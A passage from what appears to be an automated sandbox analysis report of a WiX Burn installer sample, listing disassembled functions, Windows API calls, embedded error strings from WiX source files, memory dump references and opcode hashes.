                                                                                                                                                                                                                                                                            • swidtag, xrefs: 008F7D34
                                                                                                                                                                                                                                                                            • Failed to format tag folder path., xrefs: 008F7E16
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateErrorLast$DirectoryFilelstrlen
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$d:\a\wix4\wix4\src\burn\engine\registration.cpp$swidtag
                                                                                                                                                                                                                                                                            • API String ID: 583680227-1772413233
                                                                                                                                                                                                                                                                            • Opcode ID: db34f762ebd4d2be940f5e8928117365596089c602c3042d50bfe34c7a73c1ce
                                                                                                                                                                                                                                                                            • Instruction ID: a1763d71c99c2e3ea17a31d87c1071c833f433b58ef2cb8fb0e2e95f0867693e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db34f762ebd4d2be940f5e8928117365596089c602c3042d50bfe34c7a73c1ce
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA41C631E44619BBEB11DAA5CC06FAFBB75FF44B11F108191B600FA290E7B15E509B90
                                                                                                                                                                                                                                                                            Function 008E8B6F Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 111COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(7FFFFFFE,00000000,00000000,00000000,?,?,?,008E85FC,00000000,?,00000000,?,00000000,?,008FA80F), ref: 008E8B82
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(7FFFFFFE,7FFFFFFE,?,7FFFFFFE,?,008E85FC,00000000,?,00000000,?,00000000,?,008FA80F,?,00000001,00000000), ref: 008E8C9E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-1256323647
                                                                                                                                                                                                                                                                            • Opcode ID: 9fe77e1f32f587fd0ba2640c2513e5f64492cdd7629dec80f3f038b731722662
                                                                                                                                                                                                                                                                            • Instruction ID: e8d8937f6fb561ae7546174d2d3cc6e61ebfa2009f45ba24d314e7a262874fc3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fe77e1f32f587fd0ba2640c2513e5f64492cdd7629dec80f3f038b731722662
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA31F871A41759FBDF219F96CC46E5E7A68FF06751F100120FB08EA180DBB0EE509BA0
                                                                                                                                                                                                                                                                            Function 0090D010 Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0090D01D
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0090D095
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0090D0AC
                                                                                                                                                                                                                                                                              • Part of subcall function 0090CE40: SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000014,?,00000060,?,?,00000000,?,0090CD2A,?,00000060), ref: 0090CE7E
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000082,?,?), ref: 0090D0C3
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0090D0D1
                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0090D0D8
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0090D0EC
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,00000000), ref: 0090D11C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$LongProc$MessagePost$Quit
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3225497149-0
                                                                                                                                                                                                                                                                            • Opcode ID: c6e7329123b2a9345aba0dbd348bd0c9c7b8b06c3b79f448b6a24504e6bef6f6
                                                                                                                                                                                                                                                                            • Instruction ID: e073f96bcb008c88d3ec93768b326abb40e616b84cd4e531a9ef0be633c3140b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6e7329123b2a9345aba0dbd348bd0c9c7b8b06c3b79f448b6a24504e6bef6f6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF318E36119205BFDB259FA9CD48E6B7BBDFF86310F004A28F606921E1C6349911EB60
                                                                                                                                                                                                                                                                            Function 0092F9EB Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7eaf186ae0cbf7de8f6fa16e82fe6069b98ea90ea005d767dd8ae63d22e784bf
                                                                                                                                                                                                                                                                            • Instruction ID: 0f7861ebd635119ccde668fd735b9399e12fb00007f669c8314f20088cc9d81b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7eaf186ae0cbf7de8f6fa16e82fe6069b98ea90ea005d767dd8ae63d22e784bf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EBB169729012759FDB11CF68ECA2BAE7BB9EF55310F244175E848AB386D3749901CBA0
                                                                                                                                                                                                                                                                            Function 009481C4 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 187COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00947F53,00000000,00000000,00948702,00000000,00000000,00000000,00000000,00000001,?,00000000,?,00000000), ref: 009481E8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Unknown HTTP status code %d, returned from URL: %ls, xrefs: 00948381
                                                                                                                                                                                                                                                                            • Failed to get redirect url: %ls, xrefs: 009483AB
                                                                                                                                                                                                                                                                            • Failed to get HTTP status code for failed request to URL: %ls, xrefs: 00948221
                                                                                                                                                                                                                                                                            • Failed to get HTTP status code for request to URL: %ls, xrefs: 009483BE
                                                                                                                                                                                                                                                                            • Failed to send request to URL: %ls, trying to process HTTP status code anyway., xrefs: 009481FF
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 009483CD
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                            • String ID: Failed to get HTTP status code for failed request to URL: %ls$Failed to get HTTP status code for request to URL: %ls$Failed to get redirect url: %ls$Failed to send request to URL: %ls, trying to process HTTP status code anyway.$Unknown HTTP status code %d, returned from URL: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1452528299-2050984236
                                                                                                                                                                                                                                                                            • Opcode ID: 5b2a79dea90e059f22d0639a7d0be522a5bb04c5d56f0793c81acf23219684fc
                                                                                                                                                                                                                                                                            • Instruction ID: 8b97524295a01ac232294e29b866fed6a2bcf759230acdd5218ccc82ec33e2ed
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b2a79dea90e059f22d0639a7d0be522a5bb04c5d56f0793c81acf23219684fc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A514672A40516A7DB254EA8CC0EF6F7A6CEB81F50F144665F910EB2A0EEB5DD009690
                                                                                                                                                                                                                                                                            Function 0094B8B0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 154timeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 0094B9D2
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0094B9DC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Time$ErrorFileLastSystem
                                                                                                                                                                                                                                                                            • String ID: Failed to convert system time to file time.$Failed to copy time.$clbcatq.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\timeutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2781989572-1833903446
                                                                                                                                                                                                                                                                            • Opcode ID: 7eceee6761d8351b4a7833c5df57310fee82db5c242f3c09582acc0e185388f2
                                                                                                                                                                                                                                                                            • Instruction ID: 085b379f3ad19b4f9a10cae65ca736f27fff2bfc57d17ee6c177d2392e2bdc4e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7eceee6761d8351b4a7833c5df57310fee82db5c242f3c09582acc0e185388f2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE410672B50215BADB249B788C5AF7FB66DFF91708F004919BA01B72C0D774CE0183A1
                                                                                                                                                                                                                                                                            Function 00948047 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 139COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00947F34,00000000,00000000,00000001), ref: 009480F0
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00947F34,00000000,00000000,00000001), ref: 00948152
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                            • String ID: Failed to add header to HTTP request.$Failed to allocate string for resource URI.$Failed to append query strong to resource from URI.$Failed to open internet request.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1452528299-283382383
                                                                                                                                                                                                                                                                            • Opcode ID: b17f146f80905af3c8cea178b743173fe484d2fe4de70102d5906e55a7f75cb1
                                                                                                                                                                                                                                                                            • Instruction ID: 8faab78d2e502208eed95d6dcab0aab6d4f351c11ec19d483fd3f6f8cc2e673e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b17f146f80905af3c8cea178b743173fe484d2fe4de70102d5906e55a7f75cb1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62414B73A58325BBEB315A958C49FAF7A6CAF45B94F014125FE04BB191EAB0CC0192F1
                                                                                                                                                                                                                                                                            Function 008FD33E Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 137sleepCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0,009031C1,009031C1), ref: 008FD3BF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                                            • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$d:\a\wix4\wix4\src\burn\engine\cache.cpp$per-machine$per-user
                                                                                                                                                                                                                                                                            • API String ID: 3472027048-1762823252
                                                                                                                                                                                                                                                                            • Opcode ID: 8dcd5c990a156ea603edeb1300c7d03ac8518439999a73ce4721efd84a787512
                                                                                                                                                                                                                                                                            • Instruction ID: 82d856d45143ecc73949d3c67ba6af6ec482f7ac5480b29ea489780c941ae852
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dcd5c990a156ea603edeb1300c7d03ac8518439999a73ce4721efd84a787512
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C412E71A4031DBBEB21EA6A8C07F7F265DFB11715F104120BF04FA191D6B49D5097A6
                                                                                                                                                                                                                                                                            Function 0093D37A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Error reading wix version registry value due to unexpected data type: %u$Failed to convert registry string to wix version.$Failed to copy QWORD wix version value.$Failed to read wix version registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2001391462-1929277467
                                                                                                                                                                                                                                                                            • Opcode ID: ac242df2f5990cfad055d5ec6ca9666f35e5a405fe97ea318f001c84d02c7098
                                                                                                                                                                                                                                                                            • Instruction ID: 7448189e6029a9a35544a3e443a7a7d68e69089784959029bb86331a1d1aa27f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac242df2f5990cfad055d5ec6ca9666f35e5a405fe97ea318f001c84d02c7098
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9941C772E41318B6DF219B959C4EFEFBAB8EF81714F104056FA04B62D1E2745E40DAA1
                                                                                                                                                                                                                                                                            Function 00929350 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00929387
                                                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0092938F
                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00929418
                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00929443
                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00929498
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                            • Opcode ID: 86c1ec2b23fd59ee82060c53f8d71b702fe204724c0734725fe683fa93dd2bfa
                                                                                                                                                                                                                                                                            • Instruction ID: c561a84b41a5c66d878388bdabc80000b3be4877add5621912af79c9bb22d32d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86c1ec2b23fd59ee82060c53f8d71b702fe204724c0734725fe683fa93dd2bfa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F041A934E00228ABCF10EF69E884A9E7BB9FF45318F148155E8195B3AAD731E955CB90
                                                                                                                                                                                                                                                                            Function 0093D559 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,008F8EB7,?,?,?,?), ref: 0093D584
                                                                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,?,008F8EB7,?,?,?,?), ref: 0093D609
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: EnumInfoQueryValue
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate array for registry value name$Failed to enumerate registry value$Failed to get max size of value name under registry key.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 918324718-3509199686
                                                                                                                                                                                                                                                                            • Opcode ID: 3ab625ace38145370f3beb403745fb54bc734df28ab8841c7ea49c49fb97847d
                                                                                                                                                                                                                                                                            • Instruction ID: 486351ec9e60bdf06a94e2754f78aabdfca5c2359fbbd891062338badd546519
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ab625ace38145370f3beb403745fb54bc734df28ab8841c7ea49c49fb97847d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03217DB7601218BBEB015F15AC59EBF366DEBC575CF124029BE18E7340E6748D019E70
                                                                                                                                                                                                                                                                            Function 008F770A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,008E6CF2,000000FF,04685000,000000FF,00000000,PackageVersion,008E6CF2,8D18C483,009031C1,00000001,00000000,008E6CF2,009031C1,008E6CF2), ref: 008F7794
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,PackageVersion,008E6CF2,8D18C483,009031C1,00000001,00000000,008E6CF2,009031C1,008E6CF2,00000000,009031C1,009031C1,009031C1,008E6CF2), ref: 008F77B1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F774A, 008F77F8
                                                                                                                                                                                                                                                                            • PackageVersion, xrefs: 008F7775
                                                                                                                                                                                                                                                                            • Failed to remove update registration key: %ls, xrefs: 008F77E6
                                                                                                                                                                                                                                                                            • Failed to format key for update registration., xrefs: 008F7738
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
